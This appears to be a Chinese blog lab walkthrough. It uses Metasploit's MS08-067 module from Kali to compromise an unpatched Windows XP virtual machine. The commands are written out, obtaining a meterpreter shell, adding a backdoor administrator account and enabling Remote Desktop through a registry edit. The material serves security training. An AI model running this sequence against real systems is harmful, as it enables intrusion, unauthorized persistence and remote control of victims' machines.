Metasploit的一次尝试ms08_067

实验准备:1.VM虚拟机中Linux Kali攻击机、没有打过补丁的xp系统(同时关闭防火墙)、

  kali IP:192.168.19.137

  xp IP:192.168.19.144

  在进行漏洞渗透攻击之前先确定两者是否在同一网段,

  xp打开命令框输入:xp中输入ipconfig

  kali中输入:ifconfig

  可以看到二者在同一网段。如果二者不在同一网段可以通过虚拟机网络设置统一设置为NAT模式链接。

  在kali命令框输入命令查看连接情况。:ping xp ip

成功完成上述步骤则可进行漏洞渗透攻击。

1:打开metasploit中的msfconsole框架

2.使用ms08_067模块,通过命令:use exploit/windows/smb/ms08_067_netapi

  如果不清楚ms08_067_067_netapi的路径可通过命令:search ms08_067_067_netapi  查找路径

3:设置模块中的参数与加载一枚payload
    首先我们可以使用show options 来查看所需要设置的参数

  命令:show options


4.设置参数

命令:set RHOST 被攻击者ip

           set LHOST 攻击者ip


5.设置完成后可进行攻击 

命令:exploit

反弹一个meterpreter就表示攻击成功此时输入shell就可调用系统的cmd命令框了。

6.可通过命令添加用户:net user 用户名 密码 /add

通过net user 命令查看刚才设置的用户。

7.通过命令进行提权:net localgroup administrators 用户名 /add

8.通过命令打开3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
查看端口开放
9.进行远程连接

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值